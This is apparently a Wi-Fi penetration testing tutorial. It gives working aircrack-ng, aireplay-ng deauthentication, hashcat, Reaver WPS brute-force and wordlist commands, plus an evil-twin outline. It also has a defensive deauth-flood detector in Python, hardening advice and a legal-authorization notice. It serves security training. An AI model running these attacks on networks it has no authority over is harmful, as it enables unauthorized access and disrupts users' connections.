Wireless Network Penetration Testing Guide
Wireless Security


Master advanced techniques and methodologies in wireless security

Dec 20, 2025
15 min read
AlphaSploit Team

Introduction to Wireless Security

Wireless networks present unique security challenges that differ from traditional wired networks. This comprehensive guide covers the essential techniques and tools for testing Wi-Fi security.

Required Tools

Essential tools for wireless penetration testing:

  • Aircrack-ng suite: For packet capture and cracking
  • Wireshark: For traffic analysis
  • Reaver: For WPS attacks
  • Wireless adapter with monitor mode support: Hardware requirement

Setting Up Your Environment

Prerequisites

# Install aircrack-ng suite
sudo apt update
sudo apt install aircrack-ng

# Verify your wireless adapter supports monitor mode
iwconfig
airmon-ng

Reconnaissance Phase

Start by putting your wireless adapter into monitor mode:

# Check current wireless interfaces
iwconfig

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0

# Verify monitor mode
iwconfig wlan0mon

Network Discovery

# Scan for wireless networks
sudo airodump-ng wlan0mon

# Focus on specific channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

WPA/WPA2 Testing

Capturing the Handshake

Capturing the four-way handshake is the prerequisite for offline cracking of a WPA/WPA2-PSK passphrase:

# Terminal 1: Start capturing
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon

# Terminal 2: Deauthenticate a client to force handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
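From the defender's side, the deauthentication burst above is a reliable detection signal. The following is an added example, not part of the original guide: it parses raw 802.11 management frames (assumed to have their radiotap header already stripped) from a constructed sample capture and flags any BSSID that emits more than a threshold of deauth frames within a one-second window.

```python
import struct
from collections import defaultdict

DEAUTH, BEACON = 12, 8          # 802.11 management frame subtypes
AP_BSSID = "aa:bb:cc:dd:ee:ff"  # placeholder BSSID used throughout the guide
CLIENT = "11:22:33:44:55:66"    # constructed client address

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def build_frame(subtype, addr1, addr2, addr3, body=b""):
    """Build a raw 802.11 management frame: 24-byte header plus body (no radiotap)."""
    fc = bytes([subtype << 4, 0x00])  # type bits = 0 (management), flags = 0
    duration = seq = b"\x00\x00"
    return fc + duration + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3) + seq + body

# Constructed capture: ten deauth frames within one second (the shape of an
# `aireplay-ng --deauth 10` burst, sender spoofed as the AP), then a normal beacon.
REASON_CLASS3 = struct.pack("<H", 7)  # reason code 7: class 3 frame from non-associated STA
SAMPLE_FRAMES = [(0.1 * i, build_frame(DEAUTH, CLIENT, AP_BSSID, AP_BSSID, REASON_CLASS3))
                 for i in range(10)]
SAMPLE_FRAMES.append((1.5, build_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP_BSSID, AP_BSSID)))

def parse_frame(raw):
    """Return (type, subtype, addr1, addr2, addr3, reason) or None if the frame is too short."""
    if len(raw) < 24:
        return None
    ftype, subtype = (raw[0] >> 2) & 0x3, (raw[0] >> 4) & 0xF
    a1, a2, a3 = (":".join(f"{b:02x}" for b in raw[o:o + 6]) for o in (4, 10, 16))
    reason = None
    if ftype == 0 and subtype == DEAUTH and len(raw) >= 26:
        reason = struct.unpack("<H", raw[24:26])[0]
    return ftype, subtype, a1, a2, a3, reason

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """Return {bssid: peak count} for BSSIDs exceeding `threshold` deauths per `window` seconds."""
    recent = defaultdict(list)
    alerts = {}
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None or parsed[0] != 0 or parsed[1] != DEAUTH:
            continue
        bssid = parsed[4]  # addr3 carries the BSSID in management frames
        recent[bssid] = [t for t in recent[bssid] if ts - t <= window] + [ts]
        if len(recent[bssid]) > threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(recent[bssid]))
    return alerts
```

A real deployment would feed frames from a monitor-mode interface or a pcap and raise an alert for each flagged BSSID; a handful of deauths per second is normal roaming, a burst like this one is not.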

Password Cracking

# Use aircrack-ng with wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF wpa_capture-01.cap

# Or use hashcat for GPU acceleration (hccapx with -m 2500 is the legacy format;
# hashcat 6.x deprecates it in favour of -m 22000 with hcxpcapngtool output)
cap2hccapx wpa_capture-01.cap output.hccapx
hashcat -m 2500 output.hccapx rockyou.txt

WPS Attacks

WPS (Wi-Fi Protected Setup) can be vulnerable to brute-force attacks:

# Check for WPS-enabled networks
sudo wash -i wlan0mon

# Launch WPS PIN attack with Reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Evil Twin Attacks

Create a rogue access point to capture credentials:

# Install hostapd and dnsmasq
sudo apt install hostapd dnsmasq

# Configure fake AP
# Edit /etc/hostapd/hostapd.conf
# Launch attack with airbase-ng or hostapd

Traffic Analysis

Capturing and Analyzing Traffic

# Capture packets
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Analyze with Wireshark
wireshark capture-01.cap

# Filter for cleartext application traffic (HTTP, FTP, Telnet, etc.)
# Note: WPA-encrypted frames show only as 802.11 data until Wireshark is given
# the PSK and a captured handshake (Edit > Preferences > Protocols > IEEE 802.11)

Defense Strategies

Protect your wireless network from these attacks:

  • Use WPA3 encryption when available
  • Create strong, complex passwords (minimum 12 characters)
  • Disable WPS if not needed
  • Hide SSID (security through obscurity only; clients still reveal it in probe requests, so do not rely on it)
  • Enable MAC filtering as an additional layer (addresses can be spoofed, so it is not a control on its own)
  • Apply firmware updates regularly
  • Use a VPN for sensitive communications
  • Segment the network (keep the guest network separate from the main network)

Advanced Techniques

Custom Wordlist Generation

# Use crunch for pattern-based wordlists (with -t, min and max length must equal the pattern length)
crunch 11 11 -t password@@@ > custom.txt

# Use cewl to scrape website for keywords
cewl https://target.com -w wordlist.txt

Rule-Based Attacks

# Use hashcat rules
hashcat -m 2500 capture.hccapx wordlist.txt -r rules/best64.rule

Legal and Ethical Considerations

Important: Only test wireless networks you own or have explicit written permission to test. Unauthorized wireless network testing is illegal in most jurisdictions.

Always:

  • Get written authorization
  • Document your scope of work
  • Report findings professionally
  • Secure any captured data
  • Follow responsible disclosure practices

Conclusion

Wireless penetration testing is an essential skill for security professionals. Practice these techniques in controlled environments like your own lab or authorized CTF platforms before attempting real-world assessments.

Remember that strong security comes from layers of defense, not just a single measure.